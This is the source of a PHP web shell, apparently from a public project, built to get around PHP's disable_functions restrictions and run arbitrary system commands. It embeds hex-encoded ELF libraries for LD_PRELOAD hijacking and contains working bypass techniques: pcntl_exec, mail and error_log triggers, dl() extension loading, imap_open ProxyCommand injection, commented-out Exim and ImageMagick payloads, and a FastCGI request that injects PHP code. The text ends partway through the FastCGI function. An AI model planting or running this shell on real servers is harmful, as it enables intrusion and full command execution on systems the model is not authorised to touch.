shell.php

<?php
error_reporting(E_ALL ^ E_NOTICE);

/*
 * Bypass disable function shell
 *
 * Github项目地址: https://github.com/l3m0n/Bypass_Disable_functions_Shell
 *
 * 仅限安全测试, 请勿用于非法途径
 *
 */

if(is_x64()){
    define(ARCH, 64);
}else{
    define(ARCH, 32);
}

$OS = strtoupper(substr(PHP_OS,0,3));
if($OS === 'WIN') {
    define(OS, 'Windows');
}elseif ($OS === 'DAR'){
    define(OS, 'Darwin');
}else{
    define(OS, 'Linux');
}
unset($OS);

define(WRITE_DIR, sys_get_temp_dir() . DIRECTORY_SEPARATOR);
define(FAILURE, '3ee28fe1a60c95b89d29317f122c7021');

$disable_function_str = get_cfg_var("disable_functions");
$disable_function_arr = explode(",",$disable_function_str);

$vul_function_str = 'dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,error_log,mb_send_mail,putenv,ini_set,apache_setenv,symlink,link';
$vul_function_arr = explode(",", $vul_function_str);

$open_basedir = get_cfg_var("open_basedir");

$myscript = $_SERVER['PHP_SELF'];

$GLOBALS["system_so_x64"] = "7f454c4602010100000000000000000003003e0001000000c006000000000000400000000000000028140000000000000000000040003800060040001c001900010000000500000000000000000000000000000000000000000000000000000004090000000000000409000000000000000020000000000001000000060000000809000000000000080920000000000008092000000000005802000000000000600200000000000000002000000000000200000006000000280900000000000028092000000000002809200000000000c001000000000000c0010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050e57464040000008408000000000000840800000000000084080000000000001c000000000000001c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000040000001400000003000000474e550066bb9e247f3731670b5cdfd534ac53233e576aef00000000030000000d000000010000000600000088c22001001440090d0000000f000000110000004245d5ecbbe3927cd871581cb98df10eead3ef0e6d1287c2000000000000000000000000000000000000000000000000000000000000000003000900380600000000000000000000000000007d00000012000000000000000000000000000000000000001c00000020000000000000000000000000000000000000008b00000012000000000000000000000000000000000000009d00000021000000000000000000000000000000000000000100000020000000000000000000000000000000000000009e00000011000000000000000000000000000000000000006100000020000000000000000000000000000000000000009c0000001100000000000000000000000000000000000000380000002000000000000000000000000000000000000000520000002200000000000000000000000000000000000000840000001200000000000000000000000000000000000000a600000010001600600b2000000000000000000000000000b900000010001700680b2000000000000000000000000000ad00000010001700600b20000000000000000000000000001000000012000900380600000000000000000000000000001600000012000c00600800000000000000000000000000007500000012000b00c0070000000000009d00000000000000005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573007072656c6f616400676574656e76007374727374720073797374656d006c6962632e736f2e36005f5f656e7669726f6e005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e3500000000000200000002000200000002000000020000000200020001000100010001000100010001000100920000001000000000000000751a690900000200be00000000000000080920000000000008000000000000009007000000000000180920000000000008000000000000005007000000000000580b2000000000000800000000000000580b200000000000100920000000000001000000120000000000000000000000e80a20000000000006000000030000000000000000000000f00a20000000000006000000060000000000000000000000f80a20000000000006000000070000000000000000000000000b20000000000006000000080000000000000000000000080b200000000000060000000a0000000000000000000000100b200000000000060000000b0000000000000000000000300b20000000000007000000020000000000000000000000380b20000000000007000000040000000000000000000000400b20000000000007000000060000000000000000000000480b200000000000070000000b0000000000000000000000500b200000000000070000000c00000000000000000000004883ec08488b05ad0420004885c07405e8430000004883c408c30000000000000000000000000000ff35ba042000ff25bc0420000f1f4000ff25ba0420006800000000e9e0ffffffff25b20420006801000000e9d0ffffffff25aa0420006802000000e9c0ffffffff25a20420006803000000e9b0ffffffff259a0420006804000000e9a0ffffff488d3d99042000488d0599042000554829f84889e54883f80e7615488b05060420004885c074095dffe0660f1f4400005dc366666666662e0f1f840000000000488d3d59042000488d3552042000554829fe4889e548c1fe034889f048c1e83f4801c648d1fe7418488b05d90320004885c0740c5dffe0660f1f8400000000005dc366666666662e0f1f840000000000803d0904200000752748833daf03200000554889e5740c488b3dea032000e82dffffffe848ffffff5dc605e003200001f3c366666666662e0f1f840000000000488d3d8901200048833f00750be95effffff660f1f440000488b05510320004885c074e9554889e5ffd05de940ffffff554889e54883ec10488d3d9a000000e89cfeffff488945f0c745fc00000000eb4f488b0510032000488b008b55fc4863d248c1e2034801d0488b00488d35740000004889c7e8a6feffff4885c0741d488b05e2022000488b008b55fc4863d248c1e2034801d0488b00c600008345fc01488b05c1022000488b008b55fc4863d248c1e2034801d0488b004885c07592488b45f04889c7e825feffffc9c30000004883ec084883c408c34556494c5f434d444c494e45004c445f5052454c4f414400000000011b033b1800000002000000dcfdffff340000003cffffff5c0000001400000000000000017a5200017810011b0c070890010000240000001c000000a0fdffff60000000000e10460e184a0f0b770880003f1a3b2a332422000000001c00000044000000d8feffff9d00000000410e108602430d0602980c0708000000000000000000009007000000000000000000000000000050070000000000000000000000000000010000000000000092000000000000000c0000000000000038060000000000000d000000000000006008000000000000190000000000000008092000000000001b0000000000000010000000000000001a0000000000000018092000000000001c000000000000000800000000000000f5feff6f00000000b8010000000000000500000000000000c0030000000000000600000000000000f8010000000000000a00000000000000ca000000000000000b0000000000000018000000000000000300000000000000180b20000000000002000000000000007800000000000000140000000000000007000000000000001700000000000000c0050000000000000700000000000000d0040000000000000800000000000000f00000000000000009000000000000001800000000000000feffff6f00000000b004000000000000ffffff6f000000000100000000000000f0ffff6f000000008a04000000000000f9ffff6f0000000003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280920000000000000000000000000000000000000000000760600000000000086060000000000009606000000000000a606000000000000b606000000000000580b2000000000004743433a202844656269616e20342e392e322d31302b6465623875322920342e392e3200002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e740000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200b80100000000000000000000000000000000000003000300f80100000000000000000000000000000000000003000400c003000000000000000000000000000000000000030005008a0400000000000000000000000000000000000003000600b00400000000000000000000000000000000000003000700d00400000000000000000000000000000000000003000800c00500000000000000000000000000000000000003000900380600000000000000000000000000000000000003000a00600600000000000000000000000000000000000003000b00c00600000000000000000000000000000000000003000c00600800000000000000000000000000000000000003000d00690800000000000000000000000000000000000003000e00840800000000000000000000000000000000000003000f00a00800000000000000000000000000000000000003001000080920000000000000000000000000000000000003001100180920000000000000000000000000000000000003001200200920000000000000000000000000000000000003001300280920000000000000000000000000000000000003001400e80a20000000000000000000000000000000000003001500180b20000000000000000000000000000000000003001600580b20000000000000000000000000000000000003001700600b2000000000000000000000000000000000000300180000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000001001200200920000000000000000000000000001900000002000b00c00600000000000000000000000000002e00000002000b00000700000000000000000000000000004100000002000b00500700000000000000000000000000005700000001001700600b20000000000001000000000000006600000001001100180920000000000000000000000000008d00000002000b0090070000000000000000000000000000990000000100100008092000000000000000000000000000b80000000400f1ff00000000000000000000000000000000010000000400f1ff00000000000000000000000000000000cd00000001000f0000090000000000000000000000000000db0000000100120020092000000000000000000000000000000000000400f1ff00000000000000000000000000000000e700000001001600580b2000000000000000000000000000f40000000100130028092000000000000000000000000000fd00000001001600600b20000000000000000000000000000901000001001500180b20000000000000000000000000001f01000012000000000000000000000000000000000000003301000020000000000000000000000000000000000000004f01000010001600600b20000000000000000000000000005601000012000c00600800000000000000000000000000005c01000012000000000000000000000000000000000000007001000020000000000000000000000000000000000000007f01000011000000000000000000000000000000000000009401000010001700680b20000000000000000000000000009901000010001700600b2000000000000000000000000000a501000012000b00c0070000000000009d00000000000000ad0100002000000000000000000000000000000000000000c10100001100000000000000000000000000000000000000d80100002000000000000000000000000000000000000000f201000022000000000000000000000000000000000000000e02000012000900380600000000000000000000000000001402000012000000000000000000000000000000000000000063727473747566662e63005f5f4a43525f4c4953545f5f00646572656769737465725f746d5f636c6f6e65730072656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e36363730005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e747279006279706173735f64697361626c6566756e632e63005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f64736f5f68616e646c65005f44594e414d4943005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f00676574656e764040474c4942435f322e322e35005f49544d5f64657265676973746572544d436c6f6e655461626c65005f6564617461005f66696e690073797374656d4040474c4942435f322e322e35005f5f676d6f6e5f73746172745f5f00656e7669726f6e4040474c4942435f322e322e35005f656e64005f5f6273735f7374617274007072656c6f6164005f4a765f5265676973746572436c6173736573005f5f656e7669726f6e4040474c4942435f322e322e35005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e35005f696e6974007374727374724040474c4942435f322e322e3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000b801000000000000b8010000000000003c00000000000000030000000000000008000000000000000000000000000000380000000b0000000200000000000000f801000000000000f801000000000000c80100000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000c003000000000000c003000000000000ca0000000000000000000000000000000100000000000000000000000000000048000000ffffff6f02000000000000008a040000000000008a04000000000000260000000000000003000000000000000200000000000000020000000000000055000000feffff6f0200000000000000b004000000000000b004000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000d004000000000000d004000000000000f0000000000000000300000000000000080000000000000018000000000000006e000000040000004200000000000000c005000000000000c0050000000000007800000000000000030000000a0000000800000000000000180000000000000078000000010000000600000000000000380600000000000038060000000000001a00000000000000000000000000000004000000000000000000000000000000730000000100000006000000000000006006000000000000600600000000000060000000000000000000000000000000100000000000000010000000000000007e000000010000000600000000000000c006000000000000c0060000000000009d01000000000000000000000000000010000000000000000000000000000000840000000100000006000000000000006008000000000000600800000000000009000000000000000000000000000000040000000000000000000000000000008a00000001000000020000000000000069080000000000006908000000000000180000000000000000000000000000000100000000000000000000000000000092000000010000000200000000000000840800000000000084080000000000001c00000000000000000000000000000004000000000000000000000000000000a0000000010000000200000000000000a008000000000000a0080000000000006400000000000000000000000000000008000000000000000000000000000000aa0000000e0000000300000000000000080920000000000008090000000000001000000000000000000000000000000008000000000000000000000000000000b60000000f0000000300000000000000180920000000000018090000000000000800000000000000000000000000000008000000000000000000000000000000c2000000010000000300000000000000200920000000000020090000000000000800000000000000000000000000000008000000000000000000000000000000c700000006000000030000000000000028092000000000002809000000000000c001000000000000040000000000000008000000000000001000000000000000d0000000010000000300000000000000e80a200000000000e80a0000000000003000000000000000000000000000000008000000000000000800000000000000d5000000010000000300000000000000180b200000000000180b0000000000004000000000000000000000000000000008000000000000000800000000000000de000000010000000300000000000000580b200000000000580b0000000000000800000000000000000000000000000008000000000000000000000000000000e4000000080000000300000000000000600b200000000000600b0000000000000800000000000000000000000000000001000000000000000000000000000000e90000000100000030000000000000000000000000000000600b0000000000002400000000000000000000000000000001000000000000000100000000000000110000000300000000000000000000000000000000000000840b000000000000f200000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000780c00000000000088050000000000001b0000002b0000000800000000000000180000000000000009000000030000000000000000000000000000000000000000120000000000002802000000000000000000000000000001000000000000000000000000000000";
$GLOBALS["system_so_x32"] = "7f454c4601010100000000000000000003000300010000001004000034000000080800000000000034002000050028001b00180001000000000000000000000000000000f0050000f0050000050000000010000001000000f0050000f0150000f01500000c010000140100000600000000100000020000000c0600000c1600000c160000c0000000c0000000060000000400000004000000d4000000d4000000d40000002400000024000000040000000400000051e5746400000000000000000000000000000000000000000600000004000000040000001400000003000000474e550046274bfc049fbd2fbee3fc9508888b1312b57aab030000000a00000002000000060000008800200100d640090a0000000c0000000e000000bae3927c4345d5ecd871581cb98df10e6c1287c2ebd3ef0e00000000000000000000000000000000010000000000000000000000200000002b0000000000000000000000200000004700000000000000000000001200000055000000000000000000000012000000680000000000000000000000110000004e00000000000000000000001200000067000000000000000000000021000000660000000000000000000000110000001c0000000000000000000000220000008300000004170000000000001000f1ff70000000fc160000000000001000f1ff77000000fc160000000000001000f1ff100000007c03000000000000120009003f000000e00400009400000012000b0016000000b80500000000000012000c00005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573007072656c6f616400676574656e76007374727374720073797374656d006c6962632e736f2e36005f5f656e7669726f6e005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e300000000000000002000200020002000200020003000100010001000100010001000000010002005c0000001000000000000000731f69090000030088000000100000001069690d0000020094000000000000000816000008000000f4150000010e0000cc16000006010000d016000006020000d416000006050000d816000006090000e816000007010000ec16000007030000f016000007040000f416000007060000f8160000070900005589e55383ec04e8000000005b81c3541300008b93f0ffffff85d27405e81e000000e8fd000000e8d8010000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffffffa3140000006810000000e9c0ffffffffa3180000006818000000e9b0ffffffffa31c0000006820000000e9a0ffffff000000005589e55653e8bf00000081c3c21200008d6424f080bb2000000000755c8b83fcffffff85c0740e8d832cffffff890424e8b7ffffff8db324ffffff8d9320ffffff29d68b8324000000c1fe0283ee0139f0731f908d74260083c001898324000000ff948320ffffff8b832400000039f072e6c68320000000018d6424105b5e5dc3eb0d909090909090909090909090905589e553e83000000081c3331200008d6424ec8b9328ffffff85d274158b83f4ffffff85c0740b8d9328ffffff891424ffd08d6424145b5dc38b1c24c39090905589e55383ec24e8edffffff81c3f01100008d83f8eeffff890424e8ccfeffff8945f0c745f400000000eb418b83f8ffffff8b008b55f4c1e20201d08b008d9305efffff89542404890424e8bcfeffff85c074158b83f8ffffff8b008b55f4c1e20201d08b00c600008345f4018b83f8ffffff8b008b55f4c1e20201d08b0085c075a98b45f0890424e86efeffff83c4245b5dc39090909090909090909090905589e55653e84fffffff81c3521100008b8318ffffff83f8ff74198db318ffffff8db426000000008d76fcffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c318110000e840feffff595bc9c34556494c5f434d444c494e45004c445f5052454c4f41440000000000ffffffff0000000000000000ffffffff000000000000000008160000010000005c0000000c0000007c0300000d000000b8050000f5feff6ff8000000050000003402000006000000340100000a0000009e0000000b0000001000000003000000dc160000020000002800000014000000110000001700000054030000110000002403000012000000300000001300000008000000feffff6ff4020000ffffff6f01000000f0ffff6fd2020000faffff6f0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c1600000000000000000000c2030000d2030000e2030000f2030000020400004743433a2028474e552920342e342e3720323031323033313320285265642048617420342e342e372d32332900002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e646174612e72656c2e726f002e64796e616d6963002e676f74002e676f742e706c74002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000001b0000000700000002000000d4000000d400000024000000000000000000000004000000000000002e000000f6ffff6f02000000f8000000f80000003c00000003000000000000000400000004000000380000000b000000020000003401000034010000000100000400000001000000040000001000000040000000030000000200000034020000340200009e0000000000000000000000010000000000000048000000ffffff6f02000000d2020000d2020000200000000300000000000000020000000200000055000000feffff6f02000000f4020000f40200003000000004000000010000000400000000000000640000000900000002000000240300002403000030000000030000000000000004000000080000006d0000000900000002000000540300005403000028000000030000000a00000004000000080000007600000001000000060000007c0300007c0300003000000000000000000000000400000000000000710000000100000006000000ac030000ac03000060000000000000000000000004000000040000007c00000001000000060000001004000010040000a801000000000000000000001000000000000000820000000100000006000000b8050000b80500001c00000000000000000000000400000000000000880000000100000002000000d4050000d40500001800000000000000000000000100000000000000900000000100000002000000ec050000ec05000004000000000000000000000004000000000000009a0000000100000003000000f0150000f00500000c00000000000000000000000400000000000000a10000000100000003000000fc150000fc0500000800000000000000000000000400000000000000a8000000010000000300000004160000040600000400000000000000000000000400000000000000ad000000010000000300000008160000080600000400000000000000000000000400000000000000ba00000006000000030000000c1600000c060000c000000004000000000000000400000008000000c30000000100000003000000cc160000cc0600001000000000000000000000000400000004000000c80000000100000003000000dc160000dc0600002000000000000000000000000400000004000000d10000000800000003000000fc160000fc0600000800000000000000000000000400000000000000d6000000010000003000000000000000fc0600002d000000000000000000000001000000010000001100000003000000000000000000000029070000df0000000000000000000000010000000000000001000000020000000000000000000000400c0000900300001a0000002b000000040000001000000009000000030000000000000000000000d00f0000df010000000000000000000001000000000000000000000000000000000000000000000000000000d4000000000000000300010000000000f80000000000000003000200000000003401000000000000030003000000000034020000000000000300040000000000d2020000000000000300050000000000f402000000000000030006000000000024030000000000000300070000000000540300000000000003000800000000007c030000000000000300090000000000ac0300000000000003000a0000000000100400000000000003000b0000000000b80500000000000003000c0000000000d40500000000000003000d0000000000ec0500000000000003000e0000000000f01500000000000003000f0000000000fc15000000000000030010000000000004160000000000000300110000000000081600000000000003001200000000000c160000000000000300130000000000cc160000000000000300140000000000dc160000000000000300150000000000fc1600000000000003001600000000000000000000000000030017000100000000000000000000000400f1ff0c000000f01500000000000001000f001a000000fc15000000000000010010002800000004160000000000000100110035000000100400000000000002000b004b000000fc16000001000000010016005a00000000170000040000000100160068000000a00400000000000002000b000100000000000000000000000400f1ff74000000f81500000000000001000f0081000000ec0500000000000001000e008f0000000416000000000000010011009b000000800500000000000002000b00b100000000000000000000000400f1ffc6000000dc160000000000000100f1ffdc000000081600000000000001001200e9000000001600000000000001001000f6000000d90400000000000002000b000d0100000c160000000000000100f1ff16010000e00400009400000012000b001e0100000000000000000000200000002d0100000000000000000000200000004101000000000000000000001200000053010000b80500000000000012000c00590100000000000000000000120000006b0100000000000000000000110000007e01000000000000000000001200000090010000fc160000000000001000f1ff9c01000004170000000000001000f1ffa1010000000000000000000011000000b6010000fc160000000000001000f1ffbd010000000000000000000022000000d90100007c03000000000000120009000063727473747566662e63005f5f43544f525f4c4953545f5f005f5f44544f525f4c4953545f5f005f5f4a43525f4c4953545f5f005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e353938360064746f725f6964782e35393838006672616d655f64756d6d79005f5f43544f525f454e445f5f005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f646f5f676c6f62616c5f63746f72735f617578006279706173735f64697361626c6566756e632e63005f474c4f42414c5f4f46465345545f5441424c455f005f5f64736f5f68616e646c65005f5f44544f525f454e445f5f005f5f693638362e6765745f70635f7468756e6b2e6278005f44594e414d4943007072656c6f6164005f5f676d6f6e5f73746172745f5f005f4a765f5265676973746572436c617373657300676574656e764040474c4942435f322e30005f66696e690073797374656d4040474c4942435f322e3000656e7669726f6e4040474c4942435f322e30007374727374724040474c4942435f322e30005f5f6273735f7374617274005f656e64005f5f656e7669726f6e4040474c4942435f322e30005f6564617461005f5f6378615f66696e616c697a654040474c4942435f322e312e33005f696e697400";

$GLOBALS["php_so_x64"] = "";
$GLOBALS["php_so_x32"] = "";

//$plugin_func_arr = array(
//    "common_exec_cmd" => array("exec", "shell_exec", "system", "passthru", "popen", "proc_open"),
//    "load_so" => array("dl"),
//    "ld_preload_so" => array("mail", "error_log", "imap_mail", "mb_send_mail"),
//    "shellshock" => array("mail"),
//    "apache_mod_cgi" => array(),
//    "imagick" => array(),
//    "pwn" => array(),
//);

echo "Temp Dir:" . WRITE_DIR . "<br>";
echo "Arch: " . ARCH . "; OS: " . OS . "<br><br>";

foreach ($vul_function_arr as $func) {
        if (function_exists($func)){
            echo "<font style='color: red'>Exist: ".$func."</font><br>";
        } else {
            echo "no exist: ".$func."<br>";
        }
}

function read_file($filename){
    if(function_exists('file_get_contents')){
        return file_get_contents($filename);
    } elseif (function_exists('fopen') && function_exists('fread')){
        $handle = fopen($filename, 'r');
        $content = '';
        while(!feof($handle)){
            $content .= fread($handle, 1000);
        }
        fclose($handle);
        return $content;
    } else {
        echo "no read function";
        return;
    }
}

function write_file($filename, $content, $model="w"){
    if (function_exists('file_put_contents')) {
        file_put_contents($filename, $content);
    } else {
        echo "no write function";
        return;
    }
}

function random_str($len = 8) {
    $s = '';
    for ($i = 0; $i < $len; $i++) {
        $s .= chr(mt_rand(33, 126));
    }
    return $s;
}

function is_x64() {
    $int = "9223372036854775807";
    $int = intval($int);
    if ($int == 9223372036854775807) {
        return true;
    }
    elseif ($int == 2147483647) {
        return false;
    }
    else {
        return "error";
    }
}

function trans_cmd($cmd, $outfile){
    if (OS == 'Windows'){
        $cmd = $cmd . " > " . $outfile;
    }else{
        $cmd = $cmd . " > " . $outfile . " 2>&1";
    }
    return $cmd;
}

function send_cmd_to_file($cmd, $file = 'cmd', $result = 'result') {
    $outfile = WRITE_DIR . $result;
    $cmdfile = WRITE_DIR . $file;

    $cmd = trans_cmd($cmd, $outfile);

    write_file($cmdfile, $cmd);
    return array(
        $cmdfile,
        $outfile
    );
}

function send_cmd($cmd, $result = 'result') {
    $outfile = WRITE_DIR . $result;

    $cmd = trans_cmd($cmd, $outfile);

    return array(
        $cmd,
        $outfile
    );
}

function recv_result($result = 'result') {
    $ret = read_file($result);
    @unlink($result);
    return $ret;
}

function send_socket($data, $host, $port=9000) {
    if ( function_exists('stream_socket_client') ) {
        if (strpos($host,'unix://') !== false) {
            $client = $host;
        } else {
            $client = 'tcp://' . $host . ':' . $port;
        }

        $fp = stream_socket_client($client);
    } elseif (function_exists('fsockopen')) {
        $fp = fsockopen($host, $port, $errno, $errstr, 30);
    } else {
        return FAILURE;
    }

    if ($fp) {
        $content = "";
        fwrite($fp, $data);
        while (!feof($fp)) {
            $content .= fgets($fp, 4096);
        }
        fclose($fp);
        return $content;
    } else {
        return FAILURE;
    }
}

/*
 * 第一种: 常规绕过, 寻找漏掉的命令执行函数, 适用于winodws + linux
 * exec、shell_exec、system、passthru、popen、proc_open
 */

function common_exec_cmd($cmd) {
    $res = '';
    if (function_exists('exec')) {
        @exec($cmd, $res);
        $res = join("\n", $res);
    } elseif (function_exists('shell_exec')) {
        $res = @shell_exec($cmd);
    } elseif (function_exists('system')) {
        @ob_start();
        @system($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (@is_resource($f = @popen($cmd, "r"))) {
        $res = '';
        while (!@feof($f)) {$res .= @fread($f, 1024);}
        @pclose($f);
    } elseif (function_exists('proc_open')) {
        $descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        $process = proc_open($cmd, $descriptorspec, $pipes, null, null);
        if (is_resource($process)) {
            fwrite($pipes[0], '$stdin');
            fclose($pipes[0]);
            $res = stream_get_contents($pipes[1]);
        }else{
            return FAILURE;
        }
    } else {
        return FAILURE;
    }
    return $res;
}

/*
 * 第二种: pcntl_exec绕过
 */

function pcntl_exec_cmd($cmd) {
    if (function_exists('pcntl_exec')) {
        $cmd_arr = send_cmd_to_file($cmd, 'cmd.sh');
        pcntl_exec("/bin/bash", array($cmd_arr[0]));
        return recv_result($cmd_arr[1]);
    } else {
        return FAILURE;
    }
}

//echo pcntl_exec_cmd("id");

/*
 * 第三种: ld_preload绕过: 仅限Linux
 * mail、imap_mail、error_log、mb_send_mail
 * From: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD/
 */

function ld_preload_exec_cmd($cmd) {
    $so_file = WRITE_DIR . 'system.so';

    if (ARCH === 64) {
        write_file($so_file, hex2bin($GLOBALS['system_so_x64']));
    } else {
        write_file($so_file, hex2bin($GLOBALS['system_so_x32']));
    }

    $cmd_arr = send_cmd($cmd, 'result');
    putenv("EVIL_CMDLINE=" . $cmd_arr[0]);
    putenv("LD_PRELOAD=" . $so_file);

    if (function_exists('error_log')){
        error_log("", 1, "example@example.com");
    } elseif (function_exists('mail')){
        mail("", "", "", "");
    } elseif (function_exists('mb_send_mail')){
        mb_send_mail("","","");
    } elseif ((function_exists('imap_mail'))){
        imap_mail("","","");
    } else {
        @unlink($so_file);
        return FAILURE;
    }

    // del so file
    @unlink($so_file);
    return recv_result($cmd_arr[1]);
}

//echo ld_preload_exec_cmd($_GET['cmd']);

//$so_file = WRITE_DIR . 'system_x32.so';
//var_dump(bin2hex(read_file($so_file)));

/*
 * 第四种: ld加载php扩展:
 * ld
 * https://github.com/Medicean/as_bypass_php_disable_functions
 * https://github.com/AntSwordProject/ant_php_extension
 */

function dl_exec($cmd){
    if(function_exists('dl')){
        $so_file = WRITE_DIR . 'php.so';

        if (ARCH === 64) {
            write_file($so_file, hex2bin($GLOBALS['php_so_x64']));
        } else {
            write_file($so_file, hex2bin($GLOBALS['php_so_x32']));
        }

        $so_file = "ant_x64.so";
        dl($so_file);
        $result = antsystem($cmd);

        // del so file
        @unlink($so_file);
        return $result;
    }else{
        return FAILURE;
    }
}

//echo dl_exec("id");

/*
 * 第五种: imap_open: 仅限Linux
 */

function imap_open_exec($cmd){
    if (function_exists('imap_open')) {
        $cmd_arr = send_cmd($cmd);
        $server = "x -oProxyCommand=echo\t" . base64_encode($cmd_arr[0]) . "|base64\t-d|sh}";
        imap_open('{' . $server . ':143/imap}INBOX', '', '');
        return recv_result($cmd_arr[1]);
    }else{
        return FAILURE;
    }
}

//echo imap_open_exec("id");

/*
 * exim
 */

//function exim_exec($cmd){
//    if (function_exists('mail')) {
//        $cmd_arr = send_cmd_to_file($cmd);
//        $payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}".$cmd_arr[0]."}{ok}{error}}";
//        mail("a@localhost", "", "", "", $payload);
//        return recv_result($cmd_arr[1]);
//    }else{
//        return FAILURE;
//    }
//}

/*
 * Imagick类, 选择更加通用的绕过方式吧
 */

//function imagick_exec($cmd){
//    if(class_exists('Imagick')){
//        $imagick_file = WRITE_DIR . 'img';
//
//        $cmd_arr = send_cmd($cmd);
//
//        $exploit = <<<EOF
//push graphic-context
//viewbox 0 0 640 480
//fill 'url(https://127.0.0.1/image.jpg"|$cmd_arr[0]")'
//pop graphic-context
//EOF;
//        write_file($imagick_file, $exploit);
//
//        $thumb = new Imagick();
//        $thumb->readImage("$imagick_file");
//        $thumb->writeImage(WRITE_DIR . 'tmp');
//        $thumb->clear();
//        $thumb->destroy();
//
//        return recv_result($cmd_arr[1]);
//    }else{
//        return 'nonono';
//    }
//}


/*
 * FastCgi:
 * 9000 port
 * phpx.x-fpm.sock
 *
 * Fail: windows
 */

function p($ptr){
    return bin2hex(chr($ptr));
}

function pnv($len){
    if($len < 128){
        return p($len);
    }else{
        return p(($len >> 24) |0x80) . p(($len >> 16) & 0xFF) . p(($len >> 8) & 0xFF) . p($len & 0xFF);
    }
}

// 还需要更改具体的fastcgi参数, 目前能在linux下使用
//$host = 'unix:///run/php/php7.3-fpm.sock';
function fastcgi_exec($cmd, $file, $host, $port=9000){
    if (strlen($cmd) > 40) {
        echo "Bug: command len need < 40, will be fix.";
    }

    $cmd = base64_encode($cmd);
    $php_code = '<?php system(base64_decode("'.$cmd.'"));exit();?>';

    $php_code_len = strlen($php_code);
    $php_code_pad = p(($php_code_len >> 8) & 0xFF) . p($php_code_len & 0xFF) . p(0) . p(0);

    //$uri = bin2hex(__FILE__);
    //$uri = '/var/www/html/shell.php';
    $uri = $file;
    $uri_val_pad = pnv(strlen($uri));

    $params = '0e02434f4e54454e545f4c454e475448'.bin2hex($php_code_len).'0c10434f4e54454e545f545950456170706c69636174696f6e2f746578740b0452454d4f54455f504f5254393938350b095345525645525f4e414d456c6f63616c686f7374110b474154455741595f494e54455246414345466173744347492f312e300f0e5345525645525f534f4654574152457068702f66636769636c69656e740b0952454d4f54455f414444523132372e302e302e310f'.$uri_val_pad.'5343524950545f46494c454e414d45'.bin2hex($uri).'0b'.$uri_val_pad.'5343524950545f4e414d45'.bin2hex($uri).'091f5048505f56414c55456175746f5f70726570656e645f66696c65203d207068703a2f2f696e7075740e04524551554553545f4d4554484f44504f53540b025345525645525f504f525438300f085345525645525f50524f544f434f4c485454502f312e310c0051554552595f535452494e470f165048505f41444d494e5f56414c5545616c6c6f775f75726c5f696e636c756465203d204f6e0d01444f43554d454e545f524f4f542f0b095345525645525f414444523132372e302e302e310b'.$uri_val_pad.'524551554553545f555249'.bin2hex($uri);
    $params_len = strlen(hex2bin($params));
    $params_pad = p(($params_len >> 8) & 0xFF) . p($params_len & 0xFF) . p(0) . p(0);

    $fastcgi_data = '01017b0700080000000100000000000001047b07'.$params_pad.$params.'01047b070000000001057b07'.$php_code_pad.bin2hex($php_code).'01057b0700000000';

    $result = send_socket(hex2bin($fastcgi_data), $host, $port);
//    if($result != FAILURE){
//        $start = md5("s");;
//        $end = md5("e");;
//        $input = $result;
